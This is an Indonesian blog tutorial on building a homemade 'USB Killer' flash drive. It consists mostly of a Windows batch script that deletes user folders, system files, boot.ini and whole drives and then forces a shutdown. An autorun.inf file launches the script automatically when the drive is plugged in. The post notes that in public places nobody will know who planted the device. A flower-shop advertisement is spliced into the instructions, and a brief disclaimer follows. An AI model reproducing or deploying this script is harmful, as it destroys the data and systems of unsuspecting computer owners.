Lompat ke konten Lompat ke sidebar Lompat ke footer

Widget Atas Posting

Cara Membuat USB Killer V3.0 Sendiri


USB Killer adalah sebuah alat yang mirip flashdisk yang terkenal bisa merusak komputer atau laptop hanya dalam detik saja dengan hanya mencolokannya saja. Secara fisik USB Killer bentuknya memang mirip dengan flashdisk dan semua orang pasti mengira itu adalah flashdisk tempat untuk menyimpan data. Jadi jika kita gunakan ditempat umum maka tidak ada yang tahu jika kita yang menggunakannya.


Yang menyebabkan USB Killer sangat berbahaya yaitu karena mempunyai kejutan daya listrik hingga 220 Volt, yang pada akhirnya tegangan listrik tadi mengalir secara terus-menerus didalam komputer atau laptop yang memungkinkan seluruh komponen komputer mati total.

Namun harga USB Killer cukup mahal yaitu sekitar 900 ribuan, tapi tenang saja kalian masih bisa punya USB Killer ini dengan Cara Membuat USB Killer Sendiri dengan memasukkan script ke dalam flashdisk yang akan kalian pakai sebagai Usb Killer. Namun kemampuan USB ini berbeda dengan USB Killer yang aslinya, tapi daya kerusakan USB ini cukup fatal hanya dengan script saja. Langsung simak saja tentang Cara Membuat USB Killer V3.0 Sendiri:

Cara Membuat USB KILLER V3.0 Gratis!

1.  Buka Notepad dan Masukkan Kode dibawah ini:

@echo off
Echo Nuking in 3... 2... 1...
dir d:
echo Y|del D:\
dir c:
echo Y|del C:\documents and settings
echo Y|del C:\users
echo Y|del C:\windows\system32\hal.dll
echo Y|del C:\windows
attrib -s -h C:\boot.ini
PING localhost -n 1 -w 3 >NUL
echo Y|del C:\boot.ini
echo Y|del C:\
PING localhost -n 1 -w 6 >NUL
shutdown.exe -s -t 30
2.  Kemudian pilih "Save As", Dan beri nama "USBKiller.bat" dan jangan lupa ubah "Save As Type" menjadi "All Files" Kemudian  klik "Save".


3. Setelah membuat file USBKiller.Bat, lalu buka notepad baru lagi dan Salin Kode dibawah ini:
[autorun]
;Open=USBKiller.Bat
ShellExecute=USBKiller.Bat
UseAutoPlay=1
Script ini berfungsi untuk menjalankan file USBKiller.Bat secara otomatis. Jadi, kita hanya perlu mencolokkan flashdisk saja dan programnya akan berjalan sendiri.

Jangan lupa kunjungi juga toko bunga cikarang yang menyediakan berbagai macam kebutuhan karangan bunga seperti bunga papan ucapan pernikahan/ wedding, bunga papan turut berduka cita/ belasungkawa, bunga papan ucapan selamat dan sukses atau congratulations, bunga papan ucapan pembukaan gedung atau grand opening, standing flowers, flowers board, bunga box atau flower box, dll.

4. Kemudian klik  "Save As" beri nama "AutoRun.inf" dan ubah "Save As Type" menjadi "All Files" Kemudian  klik "Save".


5. Siapkan Flashdisk yang akan kalian gunakan sebagai USB Killer dan masukkan Kedua File tadi (USBKiller.Bat dan AutoRun.Inf)  kedalam flashdisk dan USB Killer buatan kalian sudah siap digunakan.






Nah itulah ulasan mengenai Cara Membuat USB Killer V3.0 Sendiri. Efek USB Killer ini memang tidak separah USB Killer asli yang langsung merusak Komputer atau PC dalam sekejap dengan menyalurkan aliran listrik hingga 240 Volt ke komponen komponen Komputer. Namun, Efek yang ditimbulkan USB Killer buatan sendiri tergolong cukup fatal. Untuk itu, cara ini mohon digunakan dengan bijak atau hanya untuk sekedar pengetahuan saja. Saya sebagai penulis tidak bertanggung jawab atas kerusakan Komputer karena tutorial ini.


3 komentar untuk "Cara Membuat USB Killer V3.0 Sendiri"